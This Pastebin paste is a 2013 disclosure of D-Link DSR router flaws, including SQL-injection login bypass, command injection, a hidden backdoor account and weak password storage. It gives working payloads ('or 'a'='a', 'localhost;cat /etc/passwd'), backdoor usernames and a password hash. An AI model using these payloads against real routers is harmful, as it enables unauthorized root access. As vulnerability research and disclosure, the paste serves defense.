API tools faq
paste
Advertisement
AndrewHaxalot

D-Link DSR Router Series - Remote Root Shell

AndrewHaxalot
Dec 16th, 2013
632
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.42 KB | None | 0 0
raw download clone embed print report
  1. #
  2. # CVEs:
  3. # CVE-2013-5945 - Authentication Bypass by SQL-Injection
  4. # CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
  5. #
  6. # Vulnerable Routers:
  7. # D-Link DSR-150 (Firmware < v1.08B44)
  8. # D-Link DSR-150N (Firmware < v1.05B64)
  9. # D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
  10. # D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
  11. # D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
  12. #
  13. # Download URL:
  14. # http://tsd.dlink.com.tw
  15. #
  16. # Arch:
  17. # mips and armv6l, Linux
  18. #
  19. # Author:
  20. # 0_o -- null_null
  21. # nu11.nu11 [at] yahoo.com
  22. #
  23. # Date:
  24. # 2013-08-18
  25. #
  26. # Purpose:
  27. # Get a non-persistent root shell on your D-Link DSR.
  28. #
  29. # Prerequisites:
  30. # Network access to the router ports 443 and 23.
  31. # !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
  32. #
  33. #
  34. # A list of identified vulns follows. This list is not exhaustive as I assume
  35. # more vulns are present that just slipped my attention.
  36. # The fact that D-Link implemented a backdoor user (for what reason, please??)
  37. # and just renamed it instead of completely removing it after it was targetted
  38. # by my previous exploit, as well as the triviality of those vulns I found
  39. # makes me suggest that more vulns are present that are comparably easy to
  40. # exploit.
  41. #
  42. # Since 2013-12-03, patches are available for:
  43. # DSR-150: Firmware v1.08B44
  44. # DSR-150N: Firmware v1.05B64
  45. # DSR-250 and DSR-250N: Firmware v1.08B44
  46. # DSR-500 and DSR-500N: Firmware v1.08B77
  47. # DSR-1000 and DSR-1000N: Firmware v1.08B77
  48. # via http://tsd.dlink.com.tw
  49. #
  50. # And now, have a worthwhile read :-)
  51. #
  52.  
  53.  
  54. 0. Contents:
  55.  
  56.  
  57. 1. Vulnerability: Authentication Bypass by SQL-Injection
  58. (CVE-2013-5945)
  59. 2. Vulnerability: Privilege Escalation by Arbitrary Command Execution
  60. (CVE-2013-5946)
  61. 3. Exposure: D-Link backdoor user
  62. 4. Vulnerability: Use of weak hash algorithms
  63. 5. Exposure: Passwords are stored as plain text in config files
  64. 6. Vulnerability: Bad permissions on /etc/shadow
  65.  
  66.  
  67.  
  68. 1. Vulnerability: Authentication Bypass by SQL-Injection
  69. (CVE-2013-5945)
  70.  
  71.  
  72. * Possible via the global webUI login form.
  73.  
  74. * File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:
  75.  
  76. function login.authenticate(tablename, tableInput)
  77. local username = tableInput["Users.UserName"]
  78. local password = tableInput["Users.Password"]
  79. local cur = db.execute(string.format([[
  80. SELECT *, ROWID AS _ROWID_ FROM %s
  81. WHERE %s = '%s' AND %s = '%s'
  82. ]], tablename, "UserName", username, "Password", password))
  83. local result = false
  84. local statusCode = "NONE"
  85. if cur then
  86. local row = cur:fetch({}, "a")
  87. cur:close()
  88. result = row ~= nil
  89. if result == false then
  90. statusCode = "USER_LOGIN_INVALID_PASSWORD"
  91. end
  92. end
  93. return result, statusCode
  94. end
  95.  
  96. * This function creates an SQL statement of the form:
  97.  
  98. SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';
  99.  
  100. * Since there is a default admin user account called "admin" around, this is
  101. easily exploitable by providing this to the login form:
  102.  
  103. username = admin
  104. password = ' or 'a'='a
  105.  
  106. * ...resulting in this SQL statement:
  107.  
  108. SELECT *
  109. FROM "Users"
  110. WHERE "UserName" = 'admin'
  111. AND "Password" = '' or 'a'='a';
  112.  
  113. * Old school SQL injection. Ohh, by the way...
  114.  
  115. * The same fault can be found in captivePortal.lua
  116. -- FREE NETWORKS FOR EVERYONE --
  117.  
  118.  
  119.  
  120. 2. Vulnerability: Privilege Escalation by Arbitrary Command Execution
  121. (CVE-2013-5946)
  122.  
  123.  
  124. * Possible from the Tools --> System Check page.
  125.  
  126. * File /pfrm2.0/var/www/systemCheck.htm contains:
  127.  
  128. local function runShellCmd(command)
  129. local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout
  130. local cmdOutput = pipe:read("*a")
  131. pipe:close()
  132. return cmdOutput
  133. end
  134. if (ButtonType and ButtonType == "ping") then
  135. [...]
  136. local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile
  137. globalCmdOutput = runShellCmd (cmd_ping)
  138. statusMessage = "Pinging " .. ipToPing
  139. [...]
  140. elseif (ButtonType and ButtonType == "traceroute") then
  141. [...]
  142. local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options
  143. globalCmdOutput = runShellCmd(cmd)
  144. statusMessage = "Traceroute To " .. ipToTraceRoute .. "..."
  145. [...]
  146. elseif (ButtonType and ButtonType == "dnslookup") then
  147. [...]
  148. util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile))
  149. statusMessage = "DNS Lookup for " .. internetNameToNsLookup
  150. [...]
  151.  
  152. * Command injection is possible in at least these form sections:
  153.  
  154. Ping or Trace an IP Address
  155. Perform a DNS Lookup
  156.  
  157. * When using a browser, deactivate the "onclick" JavaScript checks using
  158. a tool like Firebug. Tools like curl are not hindered by these checks.
  159.  
  160. * All forms allow input like this:
  161.  
  162. localhost;<command>
  163.  
  164. example:
  165.  
  166. localhost;cat /etc/passwd
  167.  
  168. * This user provided value is then directly used as part of the input for the
  169. call to runShellCmd(c) and thus io.popen(c) in the first form section and
  170. os.execute(c) in the second form section.
  171.  
  172. * Output from user provided commands gets displayed on the next page beneath
  173. the benign command output.
  174.  
  175. example:
  176.  
  177. [...]
  178. <textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1">
  179. traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
  180. 1 localhost (127.0.0.1) 0.429 ms 0.255 ms 0.224 ms
  181. root:!:0:0:root:/root:/bin/sh
  182. gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
  183. nobody:x:0:0:nobody:/nonexistent:/bin/false
  184. ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
  185. guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
  186. admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
  187. &lt;/textarea&gt;
  188. [...]
  189.  
  190.  
  191.  
  192. 3. Exposure: D-Link backdoor user:
  193.  
  194.  
  195. * This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:
  196.  
  197. root:!:0:0:root:/root:/bin/sh
  198. gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
  199. nobody:x:0:0:nobody:/nonexistent:/bin/false
  200. ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
  201. guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
  202. admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
  203.  
  204. * You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7".
  205. That was the account I hacked before with my previous exploit:
  206. http://www.exploit-db.com/papers/22930/
  207. And there is a new backdoor user "gkJ9232xXyruTRmY" introduced.
  208. Instead of removing the backdoor, D-Link just created a new one.
  209.  
  210. * I verified this by showing the /etc/profile:
  211.  
  212. # /etc/profile
  213. LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
  214. PATH=.:/pfrm2.0/bin:$PATH
  215. CLISH_PATH=/etc/clish
  216. export PATH LD_LIBRARY_PATH CLISH_PATH
  217. # redirect all users except root to CLI
  218. if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
  219. trap "/bin/login" SIGINT
  220. trap "" SIGTSTP
  221. /pfrm2.0/bin/cli
  222. exit
  223. fi
  224. PS1='DSR-250N> '
  225.  
  226.  
  227.  
  228. 4. Vulnerability: Use of weak hash algorithms:
  229.  
  230.  
  231. * In the /etc/shadow, salted DES hashes are used to store user passwords.
  232. Since this hash type supports at most 8 characters, users can log in by just
  233. typing the first 8 letters of their passwords when using SSH or telnet.
  234.  
  235. * An effective password length limitation of 8 characters makes brute force
  236. attacks on user accounts very feasible, even if the user chose a longer
  237. password.
  238.  
  239.  
  240.  
  241. 5. Exposure: Passwords are stored as plain text in config files:
  242.  
  243.  
  244. * A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the
  245. /tmp/system.db is built on boot time, reveals that all user passwords are
  246. stored in plain text.
  247.  
  248. Example:
  249.  
  250. [...]
  251. Users = {}
  252. Users[1] = {}
  253. Users[1]["Capabilities"] = ""
  254. Users[1]["DefaultUser"] = "1"
  255. Users[1]["UserId"] = "1"
  256. Users[1]["FirstName"] = "backdoor"
  257. Users[1]["OID"] = "0"
  258. Users[1]["GroupId"] = "1"
  259. Users[1]["UserName"] = "gkJ9232xXyruTRmY"
  260. Users[1]["Password"] = "thisobviouslyisafakepass"
  261. Users[1]["UserTimeOut"] = "10"
  262. Users[1]["_ROWID_"] = "1"
  263. Users[1]["LastName"] = "ssl"
  264. [...]
  265.  
  266.  
  267.  
  268. 6. Vulnerability: Bad permissions on /etc/shadow
  269.  
  270.  
  271. * This file should have 600 permissions set and not 644. It is world readable.
  272. Pointless, since every process runs as root, no user separation is
  273. done anyway.
  274.  
  275. DSR-250N> ls -l -a /etc/shadow
  276. -rw-r--r-- 1 root root 115 Sep 27 15:07 /etc/shadow
  277. DSR-250N> ps
  278. PID USER VSZ STAT COMMAND
  279. 1 root 2700 S init
  280. 2 root 0 SW< [kthreadd]
  281. 3 root 0 SW< [ksoftirqd/0]
  282. 4 root 0 SW< [events/0]
  283. 5 root 0 SW< [khelper]
  284. 8 root 0 SW< [async/mgr]
  285. 111 root 0 SW< [kblockd/0]
  286. 120 root 0 SW< [khubd]
  287. 123 root 0 SW< [kseriod]
  288. 128 root 0 SW< [kslowd]
  289. 129 root 0 SW< [kslowd]
  290. 150 root 0 SW [pdflush]
  291. 151 root 0 SW [pdflush]
  292. 152 root 0 SW< [kswapd0]
  293. 200 root 0 SW< [aio/0]
  294. 210 root 0 SW< [nfsiod]
  295. 220 root 0 SW< [crypto/0]
  296. 230 root 0 SW< [cns3xxx_spi.0]
  297. 781 root 0 SW< [mtdblockd]
  298. 860 root 0 SW< [usbhid_resumer]
  299. 874 root 0 SW< [rpciod/0]
  300. 903 root 0 SWN [jffs2_gcd_mtd4]
  301. 909 root 0 SWN [jffs2_gcd_mtd5]
  302. 918 root 3596 S unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
  303. 999 root 1816 S < /pfrm2.0/udev/sbin/udevd --daemon
  304. 1002 root 2988 S /pfrm2.0/bin/platformd /tmp/system.db
  305. 1003 root 3120 S /pfrm2.0/bin/evtDsptchd /tmp/system.db
  306. 1049 root 2704 S /usr/sbin/telnetd -l /bin/login
  307. 1097 root 4560 S /pfrm2.0/bin/wlanClientArlFlushd
  308. 1141 root 37000 S /pfrm2.0/bin/sshd
  309. 1154 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
  310. 1255 root 3148 S /pfrm2.0/bin/nimfd /tmp/system.db
  311. 1259 root 3068 S /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5
  312. 1375 root 3588 S /pfrm2.0/bin/firewalld /tmp/system.db
  313. 1560 root 0 SW< [key_timehandler]
  314. 1598 root 7776 S /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf
  315. 1600 root 8036 S rvgd /tmp/system.db
  316. 1612 root 0 SW [cavium]
  317. 1621 root 8424 S vpnKAd /tmp/system.db
  318. 1685 root 5372 S /pfrm2.0/sslvpn/bin/firebase -d
  319. 1702 root 5016 S /pfrm2.0/sslvpn/bin/smm -d
  320. 1711 root 6052 S /pfrm2.0/sslvpn/bin/httpd
  321. 1712 root 2700 S /bin/sh /var/sslvpn/var/httpdKeepAlive.sh
  322. 1771 root 2680 S /pfrm2.0/bin/statusD
  323. 1933 root 3092 S /pfrm2.0/bin/loggingd /tmp/system.db
  324. 1960 root 5284 S /pfrm2.0/bin/radEap -d /tmp/system.db
  325. 1962 root 2988 S /pfrm2.0/bin/rebootd /tmp/system.db
  326. 2004 root 2988 S /pfrm2.0/bin/crond /tmp/system.db
  327. 2008 root 3260 S /pfrm2.0/bin/ntpd /tmp/system.db
  328. 2196 root 3128 S /pfrm2.0/bin/intelAmtd /tmp/system.db
  329. 2205 root 1904 S /pfrm2.0/bin/fReset
  330. 2311 root 2704 S /bin/sh /pfrm2.0/bin/release_cache.sh
  331. 2312 root 2704 S /sbin/getty -L ttyS0 115200 vt100
  332. 2463 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va
  333. 2481 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va
  334. 3355 root 1768 S /pfrm2.0/bin/rt2860apd
  335. 3443 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va
  336. 3451 root 4116 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va
  337. 3457 root 3964 S /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var
  338. 3484 root 7836 S /pfrm2.0/bin/snmpd -p /var/run/snmp.pid
  339. 3518 root 4424 S /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c
  340. 3630 root 1928 S /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-
  341. 5353 root 2704 S -sh
  342. 7877 root 2568 S sleep 60
  343. 7953 root 2568 S sleep 60
  344. 8008 root 2704 R ps
  345. 16749 root 2704 S -sh
  346. 25690 root 0 SW< [RtmpCmdQTask]
  347. 25692 root 0 SW< [RtmpWscTask]
  348. DSR-250N>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!